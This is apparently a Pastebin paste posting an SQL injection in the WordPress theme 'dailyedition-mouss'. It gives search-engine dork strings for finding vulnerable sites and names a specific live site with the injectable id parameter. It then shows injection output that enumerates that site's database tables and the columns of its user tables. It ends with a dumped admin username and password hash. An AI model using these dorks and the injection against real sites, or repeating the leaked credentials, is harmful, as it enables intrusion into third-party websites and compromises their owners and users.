Kyfx

Wordpress Theme dailyedition SQL Injection

Dec 12th, 2015
675
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.15 KB | None | 0 0
  1. In Search
  2.  
  3. inurl:wp-content/themes/dailyedition-mouss
  4. "wp-content/themes/dailyedition-mouss/fiche-disque.php?id="
  5.  
  6. Example:
  7.  
  8. http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=428``
  9.  
  10.  
  11.  
  12. --- demo --
  13.  
  14. Count(table_name) of information_schema.tables where table_schema=0x686F746E65777261706E6574 is 23
  15. Tables found: wp_artists,wp_commentmeta,wp_comments,wp_disques,wp_links,wp_lockdowns,wp_login_fails,wp_options,wp_postmeta,wp_posts,wp_psr_post,wp_psr_user,wp_ratepost_post,wp_ratepost_vote,wp_term_relationships,wp_term_taxonomy,wp_terms,wp_tracking_clicks,wp_tracking_links,wp_usermeta,wp_users,wp_votes,wp_votes_users
  16. Count(column_name) of information_schema.columns where table_schema=0x686F746E65777261706E6574 and table_name=0x77705F7073725F75736572 is 5
  17. Columns found: user,post,points,ip,vote_date
  18. Count(column_name) of information_schema.columns where table_schema=0x686F746E65777261706E6574 and table_name=0x77705F7573657273 is 10
  19. Columns found: ID,user_login,user_pass,user_nicename,user_email,user_url,user_registered,user_activation_key,user_status,display_name
  20.  
  21.  
  22. user:nozagz
  23. pass:$P$BtRSLyDsZdvwwS1cwBXZuEcO2m0/mh/
Add Comment
Please, Sign In to add comment